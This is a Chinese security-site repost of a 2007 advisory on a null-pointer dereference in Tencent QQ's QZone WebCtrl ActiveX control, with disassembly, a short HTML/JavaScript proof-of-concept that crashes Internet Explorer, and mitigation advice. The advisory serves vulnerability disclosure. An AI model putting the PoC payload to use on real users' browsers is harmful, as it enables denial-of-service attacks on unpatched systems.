黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

Tencent QQ QQzone WebCtrl Activex空指针引用漏洞(0day)

2009-2-4 04:28| 投稿: security

摘要: by axis(axis_at_ph4nt0m.org)http://www.ph4nt0m.org Date: 2007-02-13 摘要: QQ是由Tencent公司开发的一个IM软件,在中...

免责声明:本站系公益性非盈利IT网站,本文由投稿者转载自互联网,文末已注明出处,其内容和图片版权归原作者所有,文中所述不代表本站观点,若有侵权或转载不当之处请从网站右下角联系我们处理。

by axis(axis_at_ph4nt0m.org)http://www.ph4nt0m.org Date: 2007-02-13 摘要: QQ是由Tencent公司开发的一个IM软件,在中国有着非常广泛的用户。幻影旅团的axis发现了一个QQZone的activex漏洞。在使用WebCtrl 方法时,将引用一个空指针,造成ie崩溃。由于该activex没有标记为safe,故会出现安全提示。 影响版本: Tencent QQ2006/2007及之前所有版本。 by axis(axis_at_ph4nt0m.org)http://www.ph4nt0m.org Date: 2007-02-13 摘要: QQ是由Tencent公司开发的一个IM软件,在中国有着非常广泛的用户。幻影旅团的axis发现了一个QQZone的activex漏洞。在使用WebCtrl 方法时,将引用一个空指针,造成ie崩溃。由于该activex没有标记为safe,故会出现安全提示。 影响版本: Tencent QQ2006/2007及之前所有版本。 细节: 在\Tencent\QQ\QZone\TWebCtrl.dll中,使用Navigate方法时,将造成一个空指针引用 051024C0 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4]051024C4 8B5424 08 MOV EDX,DWORD PTR SS:[ESP+8]051024C8 6A 00 PUSH 0051024CA 6A 00 PUSH 0051024CC 8B80 B8000000 MOV EAX,DWORD PTR DS:[EAX+B8]051024D2 6A 00 PUSH 0051024D4 6A 00 PUSH 0051024D6 52 PUSH EDX051024D7 8B08 MOV ECX,DWORD PTR DS:[EAX]此时EAX为null 幻影旅团将对此发布一个POC代码,请勿将此作为非法用途 POC: <html> <script>var fuckqq = new ActiveXObject("WebCtrl.TWebControl.1");var arg1 = 0; fuckqq.Navigate(arg1);</script> </html> 建议: 禁止ie执行activex 厂商补丁:目前厂商没有发布补丁 http://www.qq.com 关于Ph4nt0m:Ph4nt0m是国内的一个安全组织,由一群来自五湖四海的朋友,因为共同热爱网络安全而走到一起来。欢迎访问我们的网站http://www.ph4nt0m.org

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本站系公益性非盈利IT网站,本文由投稿者转载自互联网,文末已注明出处,其内容和图片版权归原作者所有,文中所述不代表本站观点,若有侵权或转载不当之处请从网站右下角联系我们处理。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部